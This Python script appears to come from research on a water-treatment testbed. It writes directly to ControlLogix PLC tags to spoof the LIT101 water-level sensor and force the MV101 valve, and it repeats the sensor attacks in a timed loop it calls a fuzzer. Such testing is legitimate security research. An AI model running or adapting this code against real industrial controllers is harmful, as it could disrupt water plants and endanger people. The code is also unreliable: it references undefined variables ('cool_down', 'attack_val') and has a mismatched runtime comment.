"""
Use pycomm python2 module to communicate with ControlLogix PLCs

adapted from: examples/test_ab_comm.py
more on: https://github.com/ruscito/pycomm
"""

import random
import time
from datetime import datetime
from pycomm.ab_comm.clx import Driver as ClxDriver


PLC_IP = {
    'plc1': '192.168.1.10',
    'plc2': '192.168.1.20',
    'plc3': '192.168.1.30',
    'plc4': '192.168.1.40',
    'plc5': '192.168.1.50',
    'plc6': '192.168.1.60',
    'plc1r': '192.168.1.11',
    'plc2r': '192.168.1.21',
    'plc3r': '192.168.1.31',
    'plc4r': '192.168.1.41',
    'plc5r': '192.168.1.51',
    'plc6r': '192.168.1.61',
}

plc = ClxDriver(True, "ecptest1.log")   # 1 min
#plc = ClxDriver(True, "ecptest3.log")   # 3 mins
#plc = ClxDriver(True, "ecptest5.log")   # 5 mins

def plcWrite(plc_ip, tag_name, value, tag_type):
    """Write a plc tag and print a BOOL status code.

    :plc_ip: To do
    :tag_name: To do
    :value: To do
    :tag_type: To do

    """
    #plc = ClxDriver()
    if plc.open(plc_ip):
        print(plc.write_tag(tag_name, value, tag_type))
        plc.close()
    else:
        print("Unable to open", plc_ip)

def plcRead(plc_ip, tag_name):
    """Read a plc tag and print the rx data

    :plc_ip: To do
    :tag_name: To do

    """
    #plc = ClxDriver()
    if plc.open(plc_ip):
        tag_val = plc.read_tag(tag_name)
        plc.close()
        return (tag_val)
    else:
        print("Unable to open", plc_ip)

def consoleLog(message, log_type="info"):
    print("[{}] ".format(datetime.now().strftime("%d/%m/%Y %I:%M:%S %p")) + message)
    if log_type == "warn":
        plc.logger.warn(message)
    else:
        plc.logger.info(message)

def attackLIT101(attack_val, attack_dur):
    plcWrite(PLC_IP['plc1'], 'HMI_LIT101.Sim', True, 'BOOL')
    consoleLog("Attacking LIT101 with value {} for {} seconds".format(attack_val, attack_dur), "warn")
    plcWrite(PLC_IP['plc1'], 'HMI_LIT101.Sim_PV', attack_val, 'REAL')
    time.sleep(attack_dur)

    plcWrite(PLC_IP['plc1'], 'HMI_LIT101.Sim', False, 'BOOL')
    consoleLog("Attack completed")

def attackMV101(attack_state, attack_dur):
    plcWrite(PLC_IP['plc1'], 'HMI_MV101.Auto', False, 'BOOL')
    consoleLog("Attacking MV101 to {} for {} seconds".format(attack_val, attack_dur), "warn")
    if (attack_state == "open"):
        plcWrite(PLC_IP['plc1'], 'HMI_MV101.Cmd', 2, 'INT')
    elif (attack_state == "closed"):
        plcWrite(PLC_IP['plc1'], 'HMI_MV101.Cmd', 1, 'INT')
    time.sleep(attack_dur)

    plcWrite(PLC_IP['plc1'], 'HMI_MV101.Auto', True, 'BOOL')
    consoleLog("Attack completed")

def main():
    plant_runtime = 3600.0 * 2  # 4 hours
    attack_dur = 30.0           # 30 seconds
    rest_dur = 60.0 * 1         # 1 min
    #rest_dur = 60.0 * 3        # 3 mins
    #rest_dur = 60.0 * 3        # 5 mins

    consoleLog("Starting SWaT Domain-bazed Fuzzer with {} min cool-down interval".format(int(cool_down/60)))

    for i in range(int(plant_runtime/(attack_dur+cool_down))):
        # Equivalence partitioning of 3 different classes of water level
        case = random.randrange(1000) % 3

        if case == 0:   # Water level <=500.0
            attack_val = random.uniform(0.0, 500.0)
            attackLIT101(attack_val, attack_dur)

        elif case == 1: # Water level >500.0 and <800.0
            attack_val = random.randrange(500, 800) + random.random()
            attackLIT101(attack_val, attack_dur)

        elif case == 2: # Water level >=800.0
            attack_val = random.uniform(800.0, 1300.0)
            attackLIT101(attack_val, attack_dur)

        # Let the plant return to normal state after an attack
        consoleLog("Returning plant to normal state for {} min".format(int(cool_down/60)))
        time.sleep(cool_down)

main()
